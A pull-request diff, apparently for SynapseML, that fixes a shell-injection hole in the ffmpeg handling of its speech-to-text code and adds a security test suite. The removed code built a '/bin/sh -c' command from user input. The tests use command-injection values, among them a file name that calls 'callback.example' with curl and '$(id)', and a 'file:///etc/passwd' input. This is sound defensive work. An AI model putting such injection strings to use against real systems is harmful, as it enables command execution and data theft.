Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@ import com.microsoft.cognitiveservices.speech.transcription.{Conversation, Conve
ConversationTranscriptionEventArgs, Participant}
import com.microsoft.cognitiveservices.speech.util.EventHandler
import org.apache.commons.io.FilenameUtils
import org.apache.commons.io.input.TeeInputStream
import org.apache.hadoop.fs.Path
import org.apache.spark.broadcast.Broadcast
import org.apache.spark.injections.SConf
Expand All @@ -30,19 +31,64 @@ import org.apache.spark.sql.types._
import org.apache.spark.sql.{DataFrame, Dataset, Row}
import spray.json._

import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, InputStream}
import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, FileOutputStream, IOException, InputStream}
import java.lang.ProcessBuilder.Redirect
import java.net.{URI, URL}
import java.util.UUID
import java.util.{Locale, UUID}
import java.util.concurrent.{LinkedBlockingQueue, TimeUnit}
import scala.concurrent.{ExecutionContext, Future, blocking}
import scala.language.existentials
import scala.util.Try

object SpeechToTextSDK extends ComplexParamsReadable[SpeechToTextSDK]

private[speech] object SpeechSDKBase {
private val FfmpegOutputArgs = Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3")
private val FfmpegProtocolWhitelist = "http,https,tcp,tls,crypto"
private val HttpSchemes = Set("http", "https")
private val UriSchemePattern = "^[A-Za-z][A-Za-z0-9+.-]*:.*".r
private val WindowsDrivePathPattern = "^[A-Za-z]:[\\\\/].*".r

def parseUri(uri: String): Option[URI] = Try(new URI(uri)).toOption

def isHttpUri(uri: URI): Boolean =
Option(uri.getScheme).map(_.toLowerCase(Locale.ROOT)).exists(HttpSchemes)

def validateFfmpegUri(uri: String): URI = {
val parsedUri = parseUri(uri).getOrElse {
throw new IllegalArgumentException("ffmpeg input URI must be a valid http(s) URI")
}
require(isHttpUri(parsedUri), "ffmpeg input URI must use the http or https scheme")
parsedUri
}

def validateRecordedFileName(fileName: String): String = {
val fn = Option(fileName).filter(_.trim.nonEmpty).getOrElse {
throw new IllegalArgumentException("Recorded file name must be non-empty when recordAudioData is true")
}
val hasUriScheme = UriSchemePattern.pattern.matcher(fn).matches()
val isWindowsDrivePath = WindowsDrivePathPattern.pattern.matcher(fn).matches()

require(!fn.startsWith("-"), "Recorded file name must not start with '-'")
require(!fn.contains('\u0000'), "Recorded file name must not contain NUL characters")
require(!hasUriScheme || (OsUtils.IsWindows && isWindowsDrivePath),
"Recorded file name must be a local file path without a URI scheme")
fn
}

def makeFfmpegCommand(uri: String,
extraArgs: Seq[String]): Seq[String] = {
validateFfmpegUri(uri)
val outputArgs = extraArgs ++ FfmpegOutputArgs
Seq("ffmpeg", "-y",
"-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000",
"-protocol_whitelist", FfmpegProtocolWhitelist, "-i", uri) ++ outputArgs ++ Seq("pipe:1")
}
}

//scalastyle:off no.finalize
private[ml] class BlockingQueueIterator[T](lbq: LinkedBlockingQueue[Option[T]],
onClose: => Unit) extends Iterator[T] with Closeable {
onClose: => Unit) extends Iterator[T] with Closeable {
var nextVar: Option[T] = None
var isDone = false
var takeAnother = true
Expand Down Expand Up @@ -242,31 +288,38 @@ abstract class SpeechSDKBase extends Transformer
dynamicParamRow: Row): (InputStream, String) = {
if (isUriAudio) { //scalastyle:ignore cyclomatic.complexity
val uri = row.getAs[String](getAudioDataCol)
val ffmpegCommand: Seq[String] = {
val body = Seq("ffmpeg", "-y",
"-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000",
"-i", uri) ++ getExtraFfmpegArgs ++ Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3", "pipe:1")

if (getRecordAudioData && OsUtils.IsWindows) {
val fn = row.getAs[String](getRecordedFileNameCol)
body ++ Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3", fn)
} else if (getRecordAudioData && !OsUtils.IsWindows) {
val fn = row.getAs[String](getRecordedFileNameCol)
Seq("/bin/sh", "-c", (body ++ Seq("|", "tee", fn)).mkString(" "))
val parsedUriOpt = SpeechSDKBase.parseUri(uri)
val extension = parsedUriOpt
.flatMap(parsedUri => Option(parsedUri.getPath))
.map(FilenameUtils.getExtension)
.getOrElse(FilenameUtils.getExtension(uri))
.toLowerCase(Locale.ROOT)
val isHttpUri = parsedUriOpt.exists(SpeechSDKBase.isHttpUri)

if (Set("m3u8", "m4a")(extension) && isHttpUri) {
val recordedFileName = if (getRecordAudioData) {
Some(SpeechSDKBase.validateRecordedFileName(row.getAs[String](getRecordedFileNameCol)))
} else {
body
None
}
}

val extension = FilenameUtils.getExtension(new URI(uri).getPath).toLowerCase()

if (Set("m3u8", "m4a")(extension) && uri.startsWith("http")) {
val ffmpegCommand = SpeechSDKBase.makeFfmpegCommand(uri, getExtraFfmpegArgs.toSeq)
val proc = new ProcessBuilder()
.redirectError(Redirect.INHERIT)
.redirectInput(Redirect.INHERIT)
.command(ffmpegCommand: _*)
.start()
val stream = proc.getInputStream
val stream = recordedFileName match {
case Some(fn) =>
try {
new TeeInputStream(proc.getInputStream, new FileOutputStream(fn), true)
} catch {
case e: IOException =>
proc.destroy()
throw e
}
case None =>
proc.getInputStream
}

if (getExtraFfmpegArgs.contains("-t")) {
val timeLimit = getExtraFfmpegArgs(getExtraFfmpegArgs.indexOf("-t") + 1).toInt
Expand All @@ -285,7 +338,7 @@ abstract class SpeechSDKBase extends Transformer
}

(stream, "mp3")
} else if (uri.startsWith("http")) {
} else if (isHttpUri) {
val conn = new URL(uri).openConnection
conn.setConnectTimeout(5000) //scalastyle:ignore magic.number
conn.setReadTimeout(5000) //scalastyle:ignore magic.number
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
// Copyright (C) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See LICENSE in project root for information.

package com.microsoft.azure.synapse.ml.services.speech

import com.microsoft.azure.synapse.ml.core.test.base.TestBase

class SpeechToTextSDKSecuritySuite extends TestBase {

private val uriWithShellMetacharacters =
"https://example.com/audio.m3u8;$(id)?token=$HOME"
private val recordedFileNameWithShellMetacharacters =
"/tmp/out.mp3; curl https://callback.example/$(id) #"
private val extraFfmpegArgs = Seq("-t", "2.5")
private val ffmpegProtocolWhitelist = "http,https,tcp,tls,crypto"

test("audio streams are passed to ffmpeg without a shell") {
val command = SpeechSDKBase.makeFfmpegCommand(
uriWithShellMetacharacters,
extraFfmpegArgs)

assert(command.head == "ffmpeg")
val whitelistIndex = command.indexOf("-protocol_whitelist")
assert(whitelistIndex > 0)
assert(command(whitelistIndex + 1) == ffmpegProtocolWhitelist)
assert(command(whitelistIndex + 2) == "-i")
assert(command(whitelistIndex + 3) == uriWithShellMetacharacters)
assert(!command.contains("/bin/sh"))
assert(!command.contains("-c"))
assert(!command.contains("|"))
assert(!command.contains("tee"))
assert(!command.contains(recordedFileNameWithShellMetacharacters))
assert(command.contains(uriWithShellMetacharacters))
assert(command.count(_ == uriWithShellMetacharacters) == 1)
assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 1)
}

test("ffmpeg command writes only to stdout") {
val command = SpeechSDKBase.makeFfmpegCommand(
uriWithShellMetacharacters,
extraFfmpegArgs)

assert(command.head == "ffmpeg")
assert(command.last == "pipe:1")
assert(!command.contains("/bin/sh"))
assert(!command.contains("|"))
assert(!command.contains("tee"))
assert(!command.contains(recordedFileNameWithShellMetacharacters))
assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 1)
}

test("ffmpeg command rejects unsupported input protocols") {
Seq(
"file:///etc/passwd",
"concat:https://example.com/a|https://example.com/b",
"data:text/plain,hello",
"httpx://example.com/audio.m3u8",
" http://example.com/audio.m3u8"
).foreach { uri =>
intercept[IllegalArgumentException] {
SpeechSDKBase.makeFfmpegCommand(uri, Seq())
}
}
}

test("ffmpeg command accepts uppercase http schemes") {
val uri = "HTTPS://example.com/audio.m3u8"
val command = SpeechSDKBase.makeFfmpegCommand(uri, Seq())

assert(command.contains(uri))
}

test("recorded file names are validated as local paths") {
assert(SpeechSDKBase.validateRecordedFileName(recordedFileNameWithShellMetacharacters) ==
recordedFileNameWithShellMetacharacters)

Seq(
"-out.mp3",
"http://example.com/out.mp3",
"https://example.com/out.mp3",
"file:///tmp/out.mp3",
"pipe:1",
"data:text/plain,hello",
"concat:/tmp/a|/tmp/b"
).foreach { fileName =>
intercept[IllegalArgumentException] {
SpeechSDKBase.validateRecordedFileName(fileName)
}
}
}

test("recorded file names must be non-empty") {
intercept[IllegalArgumentException] {
SpeechSDKBase.validateRecordedFileName("")
}
intercept[IllegalArgumentException] {
val missingProperty = System.getProperty("synapseml.speech.recordedFileName.missing")
SpeechSDKBase.validateRecordedFileName(missingProperty)
}
}
}
Loading